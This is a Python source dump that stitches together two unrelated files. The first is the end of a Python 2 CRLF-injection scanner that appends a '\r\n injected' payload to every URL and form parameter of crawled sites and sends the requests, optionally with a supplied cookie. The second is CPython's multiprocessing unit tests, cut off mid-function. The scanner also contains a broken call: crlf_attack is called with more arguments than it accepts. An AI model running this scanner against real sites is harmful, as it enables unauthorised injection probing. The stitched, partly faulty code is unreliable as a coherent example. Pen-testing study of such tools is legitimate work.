except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
except Exception as e:
print action
print e
elif method == "GET" and case == "case2":
try:
if cookie is None:
try:
res = requests.get(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents)},\
params = payloads,\
verify = False)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
else:
try:
res = requests.get(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents),\
"Cookie" : cookie},\
verify = False,\
params = payloads)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
except Exception as e:
print action
print e
elif method == "POST" and case == "case3":
try:
if cookie is None:
try:
res = requests.post(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents)},\
data = payloads,\
verify = False)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
else:
try:
res = requests.post(action, timeout = 1, \
headers = {"User-Agent" : random.choice(user_agents),\
"Cookie" : cookie},\
verify = False,\
data = payloads)
save_data(method, case, str(url_location), None, res)
except (KeyboardInterrupt, SystemExit):
connection.close()
sys.exit(0)
except Exception as e:
pass
else:
pass
except Exception as e:
print action
print e
def crlf_attack(payloads, method, action, case):
tmp_value = ""
for name in payloads.keys():
tmp_value = payloads[name]
for attack_command in attack_commands:
payloads[name] += attack_command
web_request(payloads, method, action, case)
payloads[name] = tmp_value
def partition(lst, n):
return [ lst[i::n] for i in xrange(n) ]
def attack_case1(urls, links_to_visit_params):
# links_to_visit_params will be queue
for url in urls:
# there are payloads in url
if urlparse(url)[4]:
payloads = parse_qs(urlparse(url).query)
# method
# from {u'action': [u'M01']} to {u'action': u'M01'}
for name in payloads.keys():
payloads[name] = payloads[name][0]
url_with_params = str(urlparse(url)[2]) + str(sorted(payloads.keys()))
# to reduce duplicate urls
if url_with_params not in links_to_visit_params:
# case1: there are parameters in url, not action
crlf_attack(payloads, "GET", url, "case1", attack_commands)
links_to_visit_params.append(url_with_params)
# form test
def attack_case2(urls, links_to_visit_params):
# links_to_visit_params later to queue
for url in urls:
results = make_parameters(url)
# if there is no form, it return False
if results:
for result in results:
# none attr is submit
payloads = result[0]
try:
del payloads["None"]
except Exception as e:
pass
method = result[1]
action = result[2]
if method == "GET":
url_with_params = str(urlparse(action)[2]) + str(sorted(payloads.keys()))
# to reduce duplicate urls
if url_with_params not in links_to_visit_params:
crlf_attack(payloads, "GET", action, "case2", attack_commands)
links_to_visit_params.append(url_with_params)
elif method == "POST":
url_with_params = str(urlparse(action)[2]) + str(sorted(payloads.keys()))
# to reduce duplicate urls
if url_with_params not in links_to_visit_params:
crlf_attack(payloads, "POST", action, "case3", attack_commands)
links_to_visit_params.append(url_with_params)
def predict_crlf_attack_time():
attack_command_len = len(attack_commands)
urls = []
cnt = 0
for url in collection.find({"res_code" : "200"}, {"url" : 1}):
urls.append(url["url"])
for url in urls:
payloads = parse_qs(urlparse(url).query)
payloads_number = len(payloads.keys())
cnt += payloads_number
all_count = str(cnt * attack_command_len * 3)
estimate_time = str((cnt * attack_command_len * 0.005))
# request 하나 당 0.005 ~ 0.01초가 걸리는 듯
print "*" * 120
print "total attack request will be " + all_count
print "attack estimate time will be " + estimate_time + " minutes"
print "*" * 120
def main():
usage = '''./crlf injection.py -t google'''
parser = argparse.ArgumentParser(description = "crlf injection for pen testing", \
usage = usage)
parser.add_argument("-t", "--table", required=True, help="sqlite table name to attack")
parser.add_argument("-c", "--cookie", required=False, help="filename containing cookie")
parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.0 (04/24/2014)')
args = parser.parse_args()
global cookie
# read cookie from file
cookie_filename = args.cookie
try:
f = open(cookie_filename).read()
cookie = str(f).strip()
except:
cookie = None
# read attack strings from file
global attack_commands
attack_commands = ["\r\n injected"]
global start_time
start_time = timeit.default_timer()
links_to_visit_params = []
global table_name
table_name = args.table
global collection
collection = db[table_name]
predict_crlf_attack_time()
ncores = mp.cpu_count()
processes = []
# case 1
urls = []
for url in collection.find({"res_code" : "200"}, {"url" : 1}):
urls.append(url["url"])
urls = partition(urls, ncores)
for url in urls:
process = mp.Process(target=attack_case1, args=(url, links_to_visit_params))
processes.append(process)
process.start()
for item in processes:
item.join()
processes = []
# case 2, 3
urls = []
for url in collection.find({"res_code" : "200"}, {"url" : 1}):
urls.append(url["url"])
urls = partition(urls, ncores)
for url in urls:
process = mp.Process(target=attack_case2, args=(url, links_to_visit_params))
processes.append(process)
process.start()
for item in processes:
item.join()
end_time = timeit.default_timer()
print "*" * 120
print '\ncrlf injection attack is done: ', end_time - start_time
print "*" * 120
connection.close()
if __name__ == "__main__":
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
